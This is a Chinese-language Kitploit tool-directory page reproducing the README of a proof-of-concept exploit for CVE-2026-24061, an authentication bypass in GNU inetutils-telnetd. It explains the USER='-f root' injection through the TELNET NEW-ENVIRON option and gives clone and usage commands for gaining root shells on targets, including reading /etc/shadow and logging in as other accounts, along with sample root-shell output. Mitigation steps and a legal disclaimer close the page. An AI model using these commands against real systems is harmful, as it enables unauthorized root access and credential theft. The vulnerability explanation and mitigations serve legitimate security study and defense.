Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-24061 — inetutils-telnetd 认证绕过 - 可用 | Kitploit
工具/GitHubGitHub/balgan/cve-2026-24061
漏洞分析漏洞利用Web应用程序漏洞利用网络安全渗透测试身份验证
GitHubbalgan/cve-2026-24061

CVE-2026-24061

inetutils-telnetd 认证绕过 - 可用

查看仓库
37个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-24061 — inetutils-telnetd 身份验证绕过

针对 GNU inetutils-telnetd 中身份验证绕过漏洞的概念验证利用程序。

概述

CVE-2026-24061 是一个影响 inetutils-telnetd 版本 1.9.3 至 2.7 的严重身份验证绕过漏洞。它允许远程攻击者在无需提供任何凭据的情况下,在易受攻击的系统上获取 root shell。

漏洞详情

字段值
CVE IDCVE-2026-24061
受影响软件GNU inetutils-telnetd
受影响版本1.9.3 – 2.7
漏洞类型身份验证绕过
CVSS 评分严重
攻击向量网络

工作原理

该漏洞利用了 telnetd 在协议协商期间,通过 TELNET NEW-ENVIRON 选项(RFC 1572)处理接收到的 USER 环境变量时的一个缺陷。

  1. TELNET 协议协商:当客户端连接时,服务器和客户端会协商各项能力,包括 NEW-ENVIRON 选项,该选项允许客户端发送环境变量。

  2. 恶意 USER 值:该利用程序在此协商阶段发送 USER=-f root 作为环境变量。

  3. 不安全的参数传递:易受攻击的 telnetd 将此值未经净化地传递给 login 程序。

  4. 命令注入:login 程序将 -f root 解释为命令行标志:

    • -f = "强制登录,无需身份验证"
    • root = 要登录的用户名
  5. 获取 root 权限:攻击者在从未被提示输入密码的情况下获得 root shell。

核心问题

root@kitploit:~
客户端发送:  USER = "-f root"
telnetd 运行:  login -f root
结果:        无需身份验证即授予 root shell

这等同于在具有易受攻击的 telnetd 的系统上运行 USER='-f root' telnet -a localhost。

要求

  • Python 3.6+
  • 无外部依赖(仅使用标准库)

安装

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-24061.git
cd CVE-2026-24061
chmod +x exploit.py

使用方法

root@kitploit:~
./exploit.py [选项] <目标>

选项

选项描述默认值
host目标主机名或 IP 地址必填
-p, --port目标端口23
-u, --user要注入的 USER 值-f root
-c, --command运行单条命令(非交互式)无
-t, --timeout连接超时时间(秒)10

示例

在 localhost 上获取交互式 root shell:

root@kitploit:~
./exploit.py localhost

在远程主机上获取交互式 root shell:

root@kitploit:~
./exploit.py 192.168.1.100

执行单条命令并退出:

root@kitploit:~
./exploit.py -c "id" localhost
./exploit.py -c "cat /etc/shadow" 192.168.1.100
./exploit.py -c "whoami && hostname" target.local

以不同用户登录:

root@kitploit:~
./exploit.py -u "-f admin" localhost
./exploit.py -u "-f postgres" database-server

非标准端口:

root@kitploit:~
./exploit.py -p 2323 localhost

组合选项:

root@kitploit:~
./exploit.py -p 2323 -c "uname -a" -t 5 192.168.1.100

交互模式

当不带 -c 标志运行时,该利用程序会将你带入一个交互式 shell:

  • 完整的 TTY 支持,具有正确的终端处理
  • 按 Ctrl+] 退出并关闭连接
  • 按 Ctrl+C 中断

输出示例

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  CVE-2026-24061 - inetutils-telnetd 身份验证绕过              ║
║  影响范围:inetutils-telnetd 1.9.3 - 2.7                      ║
╚══════════════════════════════════════════════════════════════╝

[*] 已连接到 192.168.1.100:23
[*] 正在协商 TELNET 选项...
[*] 已同意 NEW-ENVIRON(发送 USER='-f root')
[+] 已通过 NEW-ENVIRON 发送 USER='-f root'

Linux vulnerable-host 5.15.0 #1 SMP x86_64 GNU/Linux

root@vulnerable-host:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vulnerable-host:~# 

缓解措施

立即行动

  1. 禁用 telnetd:如果不是严格必需,请完全禁用 telnet 服务

    root@kitploit:~
    sudo systemctl stop inetutils-telnetd
    sudo systemctl disable inetutils-telnetd
    
  2. 改用 SSH:使用 SSH 替代 telnet 进行远程访问

    root@kitploit:~
    sudo apt install openssh-server
    
  3. 防火墙规则:阻止来自不受信任网络的 23 端口

    root@kitploit:~
    sudo ufw deny 23/tcp
    

长期修复

  • 在可用时更新到已修补的 inetutils 版本
  • 监控供应商的安全补丁公告

技术细节

该利用程序实现了一个最小的 TELNET 客户端,它:

  1. 与目标建立 TCP 连接
  2. 响应 TELNET 选项协商(DO/DONT/WILL/WONT)
  3. 当服务器通过 NEW-ENVIRON 请求环境变量时:
    • 在 ENV_IS 响应中发送 USER=-f root
  4. 处理终端类型(TTYPE)和窗口大小(NAWS)协商
  5. 提供交互式或命令执行模式

相关 RFC

  • RFC 854 — TELNET 协议规范
  • RFC 1572 — TELNET 环境选项

免责声明

此工具仅用于教育和授权安全测试目的。

  • 仅在你拥有或已获得明确书面许可的系统上使用此利用程序
  • 未经授权访问计算机系统在大多数司法管辖区属于违法行为
  • 作者不对因使用此工具造成的任何滥用或损害负责

许可证

MIT 许可证 — 详情请参阅 LICENSE。

参考

  • CVE-2026-24061 详情
  • GNU inetutils
  • TELNET 协议 RFC 854
下载工具